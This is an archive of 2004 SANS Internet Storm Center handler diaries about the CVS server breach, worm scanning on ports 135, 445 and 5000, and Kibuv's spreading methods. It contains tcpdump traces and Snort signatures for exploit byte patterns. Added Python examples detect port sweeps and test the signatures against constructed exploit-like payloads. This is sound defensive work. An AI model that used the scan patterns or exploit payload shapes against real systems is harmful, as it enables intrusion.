Published: 2004-05-31

All's quiet on the Internet ...

It's been a quiet weekend, Internet malfeasance-wise, so in place of emerging threats the handlers have some advice.

Since this is traditionally the start of the summer travel season (at least in the Northern hemisphere), I felt an infosec travel advisory was in order. Many of you will be traveling for business or pleasure, and will end up using the Internet services in your hotel. Keep in mind that more often than not, these connections are completely unprotected from the outside world. If you're bringing your own machine (or your work's machine) be very careful - this is not your local LAN. At one chain of hotels I often stay at while traveling, I am assigned a publicly addressable IP address with no discernible security infrastructure in place.

Besides outside threats, your system (and more importantly, the data contained therein) is at risk from internal attacks. POP3/IMAP/HTTP credentials can easily be sniffed, and man-in-the-middle attacks are trivially performed by your neighbor. Any file shares you've set up for your home/office LAN use are now available to several hundred hotel guests - make sure you're implementing proper host-based security. This point is even more applicable for those of you attending SANS training or any information security conferences.

This isn't ground breaking, and it isn't rocket science. However, it's all too easy for the keepers of the gates to forget that best practices and defense in depth concepts apply to them, as well.

"I Went To $SECURITY_EVENT and all I got was owned" T-shirts will not impress your peers.


Published: 2004-05-28

CVSHOME.ORG back on-line

CVShome.org is back on-line with patched versions.

The main site http://www.cvshome.org is back up and stable version 1.11.16 is available.

Again, we would like to reiterate their warning: "any CVS server running a release of CVS earlier than 1.11.16 or 1.12.8 be taken down immediately and patched"

2277/TCP scanning detected. We're interested in captures of any ncat sessions or other captures of more than SYNs or firewall drops.

Other than that, a mostly quiet pre-holiday-weekend Friday.


Published: 2004-05-27

More CVS woes

It appears that the trouble at CVShome is worse than originally thought.

The main site http://www.cvshome.org is still down. German online magazine Heise (1) carries a report from Derek Robert Price of the CVS team. In it, Price explains that the cvshome servers were breached and a rootkit installed before the CVS patches were applied. No further details on the initial breach are available at this time.

The CVS-Bugs mailing list archive (2) carries Price's original posting. In it, he theorises that "...cvshome.org was abused to send the email using a root kit installed prior to the patching of its CVS server for CAN-2004-0396." He advises that "any CVS server running a release of CVS earlier than 1.11.16 or 1.12.8 be taken down immediately and patched."

(1) Heise online magazine http://www.heise.de/security/news/meldung/47645

(2) CVS Bugs http://mail.gnu.org/archive/html/bug-cvs/2004-05/msg00380.html
Mark Cooper mark at mhc-online co uk


Published: 2004-05-26

A quiet day on the Internet

Today a report was made of a spyware package which was digitally signed. The package dropped two DLLs on the PC, kicom.dll and kxcom.dll. A delivery method has not been identified yet.

For removal see

This is not new; it was published in February.

There is also an unconfirmed report that Norton Internet Security 4.0 2002, 2003 & 2004 for Windows has added a new feature which pre-scans inline HTML images before writing them to the temp directory and displaying them in the web browser. This is an effort to identify web-borne worms and viruses. The unfortunate side effect is that pages load incredibly slowly: the report stated that Verizon's page took over 3 minutes to load with the scanner and under 3 seconds without it. This could result in users disabling their firewalls, which is not a good thing.

Dan Goldberg dan at madjic.net


Published: 2004-05-25

Another day in the life - Padobot, ports 5000, 135, 445

Overall, it has been a fairly quiet day for the Internet at large: just the "normal" elevated background noise and another MS worm-du-jour.

Another worm hit the streets exploiting the known Windows LSASS vulnerability. Kaspersky Labs calls this one Padobot, with both an "a" and "b" signature. Details are at:

The LSASS vulnerability is discussed in numerous Handlers Diaries, as well as Microsoft Security Bulletin MS04-011:

Possibly as a result, some have reported a very steep rise in port 5000 SYN scans. Upon closer examination, it looks like port 5000 (UPnP) is being used to locate Windows hosts, after which connection attempts are made to ports 135 or 445. Here's a sample trace:

2004/05/25 11:23:02.222515 IP > target.net.126.5000: S win 16384
2004/05/25 11:23:02.228521 IP target.net.126.5000 > S ack 1444642199 win 5840
2004/05/25 11:23:02.691561 IP > target.net.126.5000: . ack win 17520
2004/05/25 11:23:02.703911 IP > target.net.126.5000: F ack win 17520
2004/05/25 11:23:02.708177 IP > target.net.126.445: S win 16384
2004/05/25 11:23:02.710557 IP target.net.126.5000 > . ack 0 win 5840
2004/05/25 11:23:03.146508 IP target.net.126.5000 > P ack win 5840
2004/05/25 11:23:03.187780 IP target.net.126.5000 > F ack win 5840
2004/05/25 11:23:03.576007 IP > target.net.126.5000: R win 0
2004/05/25 11:23:03.626723 IP > target.net.126.5000: R win 0
2004/05/25 11:23:05.445877 IP > target.net.126.135: S win 16384
2004/05/25 11:23:07.970316 IP > target.net.126.135: S win 16384
2004/05/25 11:23:12.237244 IP > target.net.126.445: S win 16384
2004/05/25 11:23:14.512929 IP > target.net.126.135: S win 16384
2004/05/25 11:23:17.374700 IP > target.net.126.135: S win 16384
2004/05/25 11:23:21.796316 IP > target.net.126.445: S win 16384

A graph of the port 5000 activity against two different networks is at: http://people.ists.dartmouth.edu/~gbakos/port5000.png

This seems to have quickly run its course, as the graph indicates a steep climb, then an equally rapid trail-off. No doubt the vast majority of the LSASS pickin's have already been had by Sasser and its variants.

George Bakos
gbakos <at> ists.dartmouth.edu


Published: 2004-05-24

Akamai Problems, New Angle(r) On An Old Phish

Akamai Problems

Akamai, the largest of the large-scale content delivery services, was not delivering content earlier today. According to a post from Akamai:

"An isolated issue occurred this morning (roughly during the period of 8:00 a.m. – 9:30 a.m. ET), where multiple Akamai customers experienced intermittent performance and availability degradation.

This degradation was the result of a bug within one of Akamai's backend content control management tools, which allows the expiration of content on the Akamai network. The degradation was not a result of any outside interference with Akamai's network (such as Denial of Service or hacking).

Upon identification of the bug, Akamai quickly took corrective action which returned customers to normal service levels. Akamai is currently putting measures in place to return the content management tool to its normal working order and is adding safeguards such that the issue will not occur in the future. In the meantime, Akamai customers are able to serve their content through the Akamai Network normally."

So, although it sounds like the rollout of a new version of an internal tool caused them to essentially DoS themselves, things seem to be all better now.

New Angle(r) On An Old Phish

First of all, my apologies for the headline... I couldn't help myself.

It seems that the phisher folk have found some new bait. The newest angle(r) involves sending out fake "order confirmation" messages bearing links that lead to web pages containing exploits for some older IE vulnerabilities. The idea is that no one will be able to resist simply looking at where the link points, and that the phisher will then snag a few unpatched folk in the process. Let's keep those browsers patched, people. And be careful out there...

Other than that, it's been quiet.

Too quiet...

Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-05-23

Akamai problems. Quiet, well kinda quiet, day on the Internet

Update (Mon. May 24th 9 am EST, 13:00 UTC, 15:00 CEST): It appears that websites that use Akamai's distribution system are currently not reachable. Security-related web sites affected are symantec.com and trendmicro.com. Virus updates may fail as a result. Further details are currently not available and updates will be posted here as they become available. Thanks to Vidar Wilkens for alerting us of this problem. According to a post to NANOG, the outage may be the result of a DDoS attack. At this point, Akamai has no ETA for a resolution.

Update 09:45 EST: Looks like some of the Akamai hosted sites are starting to come back. Akamai posted this statement: "Due to a peering problem between ATT and UUNet, a subset of UUNet users may have experienced problems accessing Akamai delivered sites between 8-10pm EDT on Saturday May 22, 2004. The problem has been fully resolved."

"Quiet" day on the Internet

We have received a number of reports of live exploitation of CVS servers using the latest round of exploits. http://www.cvshome.org, the source for the CVS system, has been down for at least two days. No news as to what happened, although two speculations exist: the first is that they are doing an extensive review of the site and the source code, and the other is that they are being DDoS'ed so that people cannot update to the latest version of CVS (put your tin-foil hats on!). The rules at the bottom of the Diary catch the current exploits posted at K-Otik, but beware that these are stopgap rules and should be replaced once better rules come out.

Tcpdump audit trail tidbits

Tidbit #1

The log below is most likely an agobot variant du jour, scanning for 1025 (M$ RPC, LSA exploit, etc), 135 (same goes), 139 (file shares), 2745 (Beagle, Bagle), 3127 (MyDoom), 445 (Sasser, etc), 6129 (Dameware). This is the current trend, imho, of things to come: scanner bots that come loaded with a smorgasbord of exploits for the latest vulnerabilities. These botnets become veritable virtual armies waiting for the command to blow the next victim off the net.

04:28:11.568873 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.573439 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.581346 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.668977 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.673543 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.679083 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.686978 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.071790 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.077521 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.085352 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.171907 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.176461 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.184357 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.189870 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.569024 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.574691 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.581498 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.668028 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.673695 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.680553 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.686003 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)

Tidbit #2
This set is a script looking for Sasser or Dabber compromised machines:

04:45:17.543905 > foo.foo.foo.104.5554: S 3956724128:3956724128(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.546756 > foo.foo.foo.105.5554: S 3956865832:3956865832(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.548661 > foo.foo.foo.100.5554: S 3956524133:3956524133(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.551653 > foo.foo.foo.107.5554: S 3956971377:3956971377(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.553838 > foo.foo.foo.101.5554: S 3956567526:3956567526(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.569655 > foo.foo.foo.110.5554: S 3957084821:3957084821(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.988074 > foo.foo.foo.104.9898: S 3969576284:3969576284(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.990285 > foo.foo.foo.100.9898: S 3969390134:3969390134(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.994860 > foo.foo.foo.101.9898: S 3969445181:3969445181(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:18.038802 > foo.foo.foo.105.9898: S 3971494464:3971494464(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:18.070218 > foo.foo.foo.107.9898: S 3972130192:3972130192(0) win 64240 <mss 1460,nop,nop,sackOK>
04:45:18.079188 > foo.foo.foo.110.9898: S 3972431609:3972431609(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
What's happening on your net at O'Dark-thirty? Use the ISC contact link to let us know ( http://isc.sans.org/contact.php )

Want to share your logs with Dshield? Help protect the Net by sharing your logs. Check here to find out how ( http://www.dshield.org/howto.php )

Reposted a previous diary
In response to seeing the CVS exploits being used in the wild, ISC Handlers George Bakos and Mike Poor put together some simple Snort rules to detect the CVS exploits posted at K-Otik. Keep in mind that these are stopgap rules to catch these exploits only, not the vulnerability itself. The exploits are detected by Snort's SHELLCODE rules, but those rules are turned off by default. With the rules below, be sure to change the SIDs to match your local.rules numbering. NOTE: these rules will wrap, so eliminate the line feeds when adding them to your local.rules file.
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Linux)"; flow:to_server,established; content:"|45 6e 74 72 79 20 43 43 43 43 43 43 43 43 43 2f 43 43|"; offset:0; depth:20; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000000; rev:1; classtype:attempted-admin;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target BSD)"; flow:to_server,established; content:"|45 6e 74 72 79 20 61 61 61 61 61 61 61 61 61 61 61 61|"; offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000001; rev:1;classtype:attempted-admin;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Solaris)"; flow:to_server,established; content:"|41 72 67 75 6d 65 6e 74 20 62 62 62 62 62 62 62 62 62|";offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000002; rev:1;classtype:attempted-admin;)

Handler on Duty: Mike Poor
mike ^AT^ intelguardians.com
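
As an added example (not part of the handler's diary), here is a small Python script that applies the two tidbit patterns above to tcpdump SYN lines: a single source hitting the exploit/backdoor port smorgasbord on one target (Tidbit #1), and a single source probing the Sasser/Dabber backdoor ports across several hosts (Tidbit #2). The sample lines are constructed after the two traces; the source addresses (198.51.100.7, 203.0.113.9, 192.0.2.44) are made up, since the diary's capture has them stripped, and the window and count thresholds are arbitrary starting points to tune against your own audit trail.

```python
"""Flag bot-style port sweeps in tcpdump SYN output (added example)."""
import re
from collections import defaultdict

# 2004-era tcpdump SYN line (no "IP" prefix):
# HH:MM:SS.usec src.sport > dst.dport: S seq:seq(0) win N <opts> (DF)
SYN_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<src>\S+)\.(?P<sport>\d+)\s+>\s+"
    r"(?P<dst>\S+)\.(?P<dport>\d+):\s+S\s"
)

# Ports the diary ties to specific exploits and backdoors.
BOT_SWEEP_PORTS = {135, 139, 445, 1025, 2745, 3127, 6129}   # agobot-style smorgasbord
SASSER_BACKDOOR_PORTS = {5554, 9898}                         # Sasser FTP / Dabber backdoor


def _seconds(ts):
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_syns(lines):
    """Yield (t_seconds, src_host, dst_host, dst_port) for each SYN line."""
    for line in lines:
        m = SYN_RE.match(line.strip())
        if m:
            yield (_seconds(m["ts"]), m["src"], m["dst"], int(m["dport"]))


def find_sweeps(lines, window=10.0, min_ports=4, min_hosts=3):
    """Return one finding per source that behaves like a scanner bot.

    'multi-exploit sweep': one source hits >= min_ports of BOT_SWEEP_PORTS on a
    single target within `window` seconds of its first SYN (Tidbit #1 pattern).
    'backdoor hunt': one source probes a Sasser/Dabber backdoor port on
    >= min_hosts distinct targets within the same window (Tidbit #2 pattern).
    """
    by_src = defaultdict(list)
    for t, src, dst, dport in parse_syns(lines):
        by_src[src].append((t, dst, dport))

    findings = []
    for src, events in by_src.items():
        events.sort()
        t0 = events[0][0]
        in_window = [e for e in events if e[0] - t0 <= window]

        per_target = defaultdict(set)
        backdoor_hosts = set()
        for _, dst, dport in in_window:
            if dport in BOT_SWEEP_PORTS:
                per_target[dst].add(dport)
            if dport in SASSER_BACKDOOR_PORTS:
                backdoor_hosts.add(dst)

        for dst, ports in per_target.items():
            if len(ports) >= min_ports:
                findings.append({"src": src, "kind": "multi-exploit sweep",
                                 "target": dst, "ports": sorted(ports)})
        if len(backdoor_hosts) >= min_hosts:
            findings.append({"src": src, "kind": "backdoor hunt",
                             "hosts": len(backdoor_hosts)})
    return findings


# Constructed sample modelled on the two tidbits. Source addresses are made up
# (the diary's trace has them stripped); target names are placeholders.
SAMPLE = """\
04:28:11.568873 198.51.100.7.1125 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.573439 198.51.100.7.1126 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.581346 198.51.100.7.1127 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.668977 198.51.100.7.1128 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.673543 198.51.100.7.1129 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.679083 198.51.100.7.1130 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.686978 198.51.100.7.1131 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:45:17.543905 203.0.113.9.3301 > foo.foo.foo.104.5554: S 3956724128:3956724128(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.546756 203.0.113.9.3302 > foo.foo.foo.105.5554: S 3956865832:3956865832(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.548661 203.0.113.9.3303 > foo.foo.foo.100.5554: S 3956524133:3956524133(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.988074 203.0.113.9.3304 > foo.foo.foo.104.9898: S 3969576284:3969576284(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:19.000000 192.0.2.44.2020 > foo.foo.foo.107.80: S 1:1(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
"""

if __name__ == "__main__":
    for finding in find_sweeps(SAMPLE.splitlines()):
        print(finding)
```

The single web hit from 192.0.2.44 produces nothing, which is the point of keying on the port sets rather than on SYN volume alone: a bot announces itself by which ports it tries, not by how many packets it sends.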


Published: 2004-05-21

Exploit code reported for CVS Vulnerability

Follow-up to May 19th Handlers Diary: The CVS exploit published yesterday has been seen used multiple times. PATCH NOW! The CVS main homepage (cvshome.org) appears to be down. However, you should still be able to obtain patches from mirrors.


We have received information that exploit code has been reported by K-OTik Security. This exploit is of particular concern to Unix admins and could be used to compromise a number of open source projects. It is recommended that you verify signatures. This exploit can affect your system even if you don't run a CVS server: just using software that is maintained on a compromised server will put your system at risk.

One of the Handlers will be setting up a test server this afternoon to confirm that the code works. Stay tuned for more information.

Gentoo update for CVS


Open BSD


This just in from Mike Poor:

In response to seeing the CVS exploits being used in the wild, ISC Handlers George Bakos and Mike Poor put together some simple Snort rules to detect the CVS exploits posted at K-Otik. Keep in mind that these are stopgap rules to catch these exploits only, not the vulnerability itself. The exploits are detected by Snort's SHELLCODE rules, but those rules are turned off by default. With the rules below, be sure to change the SIDs to match your local.rules numbering. NOTE: these rules will wrap, so eliminate the line feeds when adding them to your local.rules file.

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Linux)"; flow:to_server,established; content:"|45 6e 74 72 79 20 43 43 43 43 43 43 43 43 43 2f 43 43|"; offset:0; depth:20; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000000; rev:1; classtype:attempted-admin;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target BSD)"; flow:to_server,established; content:"|45 6e 74 72 79 20 61 61 61 61 61 61 61 61 61 61 61 61|"; offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000001; rev:1;classtype:attempted-admin;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Solaris)"; flow:to_server,established; content:"|41 72 67 75 6d 65 6e 74 20 62 62 62 62 62 62 62 62 62|";offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000002; rev:1;classtype:attempted-admin;)

Deb Hale

Handler On Duty
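
To make the "exploits only, not the vulnerability" caveat concrete, here is an added example (not from the diary and not the handlers' rules themselves) that re-implements the content/offset/depth/dsize logic of the three Snort signatures above in Python and runs it over a few constructed CVS request payloads. The payloads are made up for this illustration and are not the K-OTik exploit code; they only reuse the leading bytes the signatures key on, so the example serves both places on this page where the rules appear.

```python
"""Apply the diary's three stopgap Snort signatures to raw CVS payloads (added example)."""

# (name, content, offset, depth, dsize-must-exceed), lifted from the rules above.
# The hex content in the rules decodes to the ASCII used here.
RULES = [
    ("CVS server heap overflow attempt (target Linux)",
     b"Entry " + b"C" * 9 + b"/CC", 0, 20, 512),
    ("CVS server heap overflow attempt (target BSD)",
     b"Entry " + b"a" * 12, 0, 18, 512),
    ("CVS server heap overflow attempt (target Solaris)",
     b"Argument " + b"b" * 9, 0, 18, 512),
]


def rule_matches(rule, payload):
    """Snort semantics: dsize:>N compares the payload length; with offset:O and
    depth:D the whole content must lie inside payload[O:O+D]."""
    _, content, offset, depth, min_dsize = rule
    if len(payload) <= min_dsize:
        return False
    return content in payload[offset:offset + depth]


def classify(payload):
    """Names of the rules that would fire on this TCP payload."""
    return [r[0] for r in RULES if rule_matches(r, payload)]


# Constructed payloads (not the published exploit): same leading bytes as the
# signatures, followed by filler to push the size past dsize.
EXPLOIT_LIKE_LINUX = b"Entry " + b"C" * 9 + b"/CC" + b"C" * 600 + b"\n"
EXPLOIT_LIKE_BSD = b"Entry " + b"a" * 700 + b"\n"
BENIGN_ENTRY = b"Entry /main.c/1.12/Tue May 18 12:00:00 2004//\n"   # ordinary client request
SAME_BUG_OTHER_FILLER = b"Entry " + b"D" * 9 + b"/DD" + b"D" * 600 + b"\n"

if __name__ == "__main__":
    for label, p in [("exploit-like (Linux)", EXPLOIT_LIKE_LINUX),
                     ("exploit-like (BSD)", EXPLOIT_LIKE_BSD),
                     ("benign Entry", BENIGN_ENTRY),
                     ("same bug, other filler", SAME_BUG_OTHER_FILLER)]:
        print(f"{label:24s} -> {classify(p) or 'no alert'}")
```

Two things fall out of running it. A request that triggers the same bug with a different filler byte never fires, which is what "stopgap" means here. And because dsize is evaluated against the size of the packet Snort is looking at, the same bytes dribbled in across small segments can slip under the 512-byte floor; the rules buy time until vulnerability-based signatures and, above all, the patch are in place.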


Published: 2004-05-20

Port 135 Traffic Increase Due To Bobax.C

Port 135 Traffic Increase Due To Bobax.C.

A third Bobax variant has been discovered that now uses the RPC/DCOM vulnerability on TCP port 135 in addition to the existing probes on TCP ports 445 and 5000. The DCOM exploit code in Bobax.C contains offsets for both Windows 2000 and Windows XP, so Bobax.C can now infect both of these OSes where Bobax.[AB] could only infect Windows XP.

For more details, see http://www.lurhq.com/bobax.html

David Goldsmith

Handler on Duty


Published: 2004-05-19

CVS/Subversion remote holes - Reporting MS vulnerabilities

CVS/Subversion remote vulnerabilities

E-Matters has released information regarding remotely exploitable overflows in the Subversion and CVS version control applications. Both projects have released fixed versions which should be available for most platforms at the time of this writing. Users of these applications are strongly encouraged to update.

The full advisories are available at the following links:

CVS: http://security.e-matters.de/advisories/072004.html
Subversion: http://security.e-matters.de/advisories/082004.html

Reporting a Security Vulnerability in a Microsoft Product

Microsoft's Security Response Center posted the following submission guidelines to multiple security mailing lists earlier today:

"The Microsoft Security Response Center investigates all reports of security vulnerabilities sent to us that affect Microsoft products. If you believe you have found a security vulnerability affecting a Microsoft product, we would like to work with you to investigate it.

We are concerned that people might not know the best way to report security vulnerabilities to Microsoft. You can contact the Microsoft Security Response Center to report a vulnerability by emailing secure@microsoft.com directly, or you can submit your report via our web-based vulnerability reporting form located at:



Microsoft Security Response Center"

Cory Altheide
Handler on Duty


Published: 2004-05-18

Port 5000 Traffic Continues; Fragmented tcp/16191 Update

Port 5000 Traffic Continues. As reported in yesterday's diary, two worms (Bobax and Kibuv.B) are responsible for the increase in tcp/5000 traffic. Microsoft Windows systems that are currently patched are not vulnerable to either worm.

Fragmented tcp/16191 Update. Additional information on the report of fragmented IP traffic towards port 16191 in the May 14 diary ( http://isc.sans.org/diary.php?date=2004-05-14 ) arrived in the mailbag today. James tells us,

"I have seen this before inside my network, and recently am seeing it again, including a couple of hits from outside now. Using Cisco v2 IDS sensors on my internal network I always see these as a set of 3 signatures:

1203 - IP fragment overwrite - Data is overwritten

1204 - IP fragment missing initial fragment

1208 - IP fragment incomplete dgram

The Cisco IDS usually indicates whether a port is a TCP or UDP port, but in this case the protocol field of the alert simply says IP."

Handler Ed Skoudis explains, "That's likely because the higher-layer protocol (TCP or UDP) header is typically included in the first fragment, including the port number itself. Therefore, because you are getting:

1204 - IP fragment missing initial fragment

You aren't seeing the TCP/UDP stuff, so the IDS labels it merely as IP."

Additional details from Cisco on packet fragmentation are online at http://www.cisco.com/univercd/cc/td/doc/product/iaabu/csids/csids4/11657_02.htm#xtocid11

Marcus H. Sachs

Handler on Duty
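
To show exactly why the sensor can say no more than "IP", here is an added example (not from the diary and not Cisco's code) that builds a UDP datagram to port 16191, fragments it the way an IP stack would, and reports what each fragment reveals when examined on its own. The addresses, the 40-byte MTU and the zeroed checksums are assumptions chosen for the illustration.

```python
"""Why a non-initial IP fragment carries no port number (added example)."""
import struct

IP_PROTO_UDP = 17
MF = 0x2000            # "more fragments" bit in the flags/fragment-offset field
IPV4_HDR = "!BBHHHBBH4s4s"

# Assumed addresses for the demo (RFC 5737 documentation ranges).
SRC = bytes([192, 0, 2, 10])
DST = bytes([198, 51, 100, 20])


def ipv4_header(total_len, ident, flags_frag, proto, src, dst):
    # Checksum left at zero: enough for the layout point being made here.
    return struct.pack(IPV4_HDR, 0x45, 0, total_len, ident, flags_frag, 64, proto, 0, src, dst)


def udp_datagram(sport, dport, payload):
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


def fragment(ident, proto, src, dst, transport, mtu=40):
    """Split transport header+data into IPv4 fragments that fit in `mtu` bytes.
    Every fragment but the last carries a multiple of 8 data bytes (the
    fragment-offset unit), exactly as a real stack would do it."""
    chunk = (mtu - 20) // 8 * 8
    frags, off = [], 0
    while off < len(transport):
        piece = transport[off:off + chunk]
        last = off + chunk >= len(transport)
        flags_frag = (0 if last else MF) | (off // 8)
        frags.append(ipv4_header(20 + len(piece), ident, flags_frag, proto, src, dst) + piece)
        off += chunk
    return frags


def ids_view(frag):
    """What an IDS can say about ONE fragment seen in isolation.
    Only the fragment at offset 0 holds the UDP/TCP header, so only it yields
    ports; every other fragment (and a first fragment too small to hold the
    transport header) can be labelled no more precisely than 'IP'."""
    _, _, _, ident, ff, _, proto, _, _, _ = struct.unpack(IPV4_HDR, frag[:20])
    offset = (ff & 0x1FFF) * 8
    more = bool(ff & MF)
    data = frag[20:]
    if offset == 0 and proto == IP_PROTO_UDP and len(data) >= 8:
        sport, dport = struct.unpack("!HH", data[:4])
        return {"ident": ident, "offset": 0, "more": more,
                "proto": "UDP", "sport": sport, "dport": dport}
    return {"ident": ident, "offset": offset, "more": more,
            "proto": "IP", "sport": None, "dport": None}


def demo(drop_first=False):
    """Fragment a UDP 16191 -> 16191 datagram; optionally lose the initial
    fragment, the situation Cisco signature 1204 reports."""
    frags = fragment(0x1234, IP_PROTO_UDP, SRC, DST,
                     udp_datagram(16191, 16191, b"A" * 60), mtu=40)
    if drop_first:
        frags = frags[1:]
    return [ids_view(f) for f in frags]


if __name__ == "__main__":
    for view in demo():
        print(view)
    print("without initial fragment:", [v["proto"] for v in demo(drop_first=True)])
```

With the first fragment dropped, every remaining fragment classifies as plain "IP" with a non-zero offset, which is what James's sensor reported; reassembly, not per-fragment inspection, is the only way back to the port numbers.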


Published: 2004-05-17

Port 5000 increase due to two worms: Bobax and Kibuv

Two very different worms are currently responsible for the rapid increase in port 5000 scans. The first, 'Bobax', uses port 5000 to identify Windows XP systems. Windows XP uses port 5000 (TCP) for 'Universal Plug and Play (UPnP)'. By default, UPnP is enabled. The second worm, 'Kibuv', will use an old vulnerability in Windows XP's UPnP implementation to exploit systems. This vulnerability was one of the first discovered in Windows XP and patches have been available.


Joe Stewart (LURHQ Corp.) compiled an analysis of this worm:

Short summary for the impatient:

Installs an HTTP listener on a random port (2000-62000). This HTTP server is used to deliver the trojan to infected systems.

Scans port 5000 (tcp). If port 5000 responds, the LSASS exploit will be used to compromise the host and download the trojan from the infecting system's HTTP server.

Contacts one of a number of web servers to notify them of the successful

Kibuv.B will start an FTP server on port 7955. Any username / password combination will work. The FTP server will always send a copy of the worm, regardless of the file requested. This is similar to other malware FTP servers.

Kibuv.B uses 7 different mechanisms to spread:

Messenger Service Buffer Overrun

IIS 5.0 WebDav vulnerability

UPnP Buffer Overflow

RPC DCOM Buffer Overflow

LSASS vulnerability

backdoors created by Weird and Beagle

Sasser FTP server overflow

The IRC server used to control Kibuv.B infected systems is no longer accepting
Kibuv will open a backdoor on port 420 (tcp).
More details: http://securityresponse.symantec.com/avcenter/venc/data/w32.kibuv.b.html

None of the vulnerabilities used by these two worms is new. Unpatched systems are likely already infected with other worms and as such do not present a significant new threat. So far, we count only about 500,000 systems infected with either worm, which is just about the same level as Sasser and Blaster.

Johannes Ullrich, jullrich_AT_sans.org


Published: 2004-05-16

SANS ISC (once again) and Microsoft - Flatten Compromised Systems

